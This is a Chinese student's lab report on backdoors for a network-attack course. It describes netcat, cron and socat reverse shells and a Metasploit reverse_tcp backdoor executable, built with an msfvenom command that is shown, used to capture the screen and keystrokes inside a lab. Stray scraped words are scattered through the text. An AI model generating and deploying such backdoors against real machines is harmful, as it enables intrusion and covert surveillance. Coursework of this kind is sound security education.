20145320周岐浩 《網絡對抗技術》 後門原理與實踐

20145320周岐浩 《網絡對抗技術》 後門原理與實踐linux

基礎問題回答

例舉你能想到的一個後門進入到你係統中的可能方式?

  • 收到一些感興趣的郵件內容(例如可愛的寵物狗和貓),點進去以後就被開了後門。
  • 盜版軟件的安裝包中可能會有後門(正版也有!!!!)
  • 在不可靠、不安全的網站中下載的解壓壓縮文件時裏面含有後門程序;

例舉你知道的後門如何啓動起來(win及linux)的方式?

  • 被篡改了註冊表
  • 設置了任務計劃啓動,例如開機時。
  • 把後門的名字設置相似服務名,迷惑用戶!

Meterpreter有哪些給你映像深入的功能?

  • 在其之下,再無隱私!

如何發現本身有系統有沒有被安裝後門?

  • 查看註冊表、進程、服務等,是否有未知的程序

實驗總結與體會

盜版軟件不安全!正版軟件要收費!反正360都已經把咱們的隱私給賣了...仍是用盜版吧..可是能不給權限盡可能不給權限!通過這幾回實驗感受咱們的電腦簡直不堪一擊,想幹嗎就幹嗎。黑客開心就好...shell

開始實驗!

首先先ping通兩臺linux和windows:
windows

linux使用netcat得到windows的shell

  • 打開netcat監聽端口
    安全

  • 在windows中使用netcat綁定cmd鏈接到linux的正在監聽的端口bash

  • 這樣linux就獲取到了winows的shell

Windows使用netcat得到Linux的shell:

方法同上相似,這裏再也不列舉。可是須要注意的是linux的shell應該是在/bin/sh網絡

設置cron啓動,windows使用netcat得到linux的shell

在linux中使用crontab指令增長一條定時3分鐘任務則利用netcat鏈接道控制端的命令
tcp

windows一直開啓netcat監聽,等到3分後,windows獲取linux的shell成功
網站

windows使用sotcat得到linux的shell:

在linux中,使用socat綁定bash與端口號,監聽,等待鏈接3d


windows中使用socat對linux進行tcp固定端口鏈接,成功獲取linux的shell!注意所使用的端口號不能被佔用!!code

使用MSF meterpreter生成後門並傳到被控主機獲取shell

  • 生成可執行文件(反彈式),肯定好反彈回來的IP地址與端口號。須要注意的是這裏老師給的是

    root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136 `PORT=443 -f exe > meter_backdoor.exe

注意不是`PORT而是LPORT(location port!)

在linux中,使用MSF設置好可執行文件對應的IP地址、端口號和payload後,打開監聽進程

因爲vmware支持直接拖拽,因此省下了傳輸的步驟。在win中雙擊運行可執行文件之前,須要將win中的殺毒軟件與防火牆設置一下。設置後再雙擊啓動win上的可執行文件,linux成功獲取winows的shell

使用MSF meterpreter生成獲取目標主機某些內容

  • 獲取目標主機的當前屏幕

  • 獲取目標主機的擊鍵記錄

    這裏能夠看到在小鍵盤和普通鍵盤的輸入並不同。

  • 在提權的過程當中失敗了

相關文章
相關標籤/搜索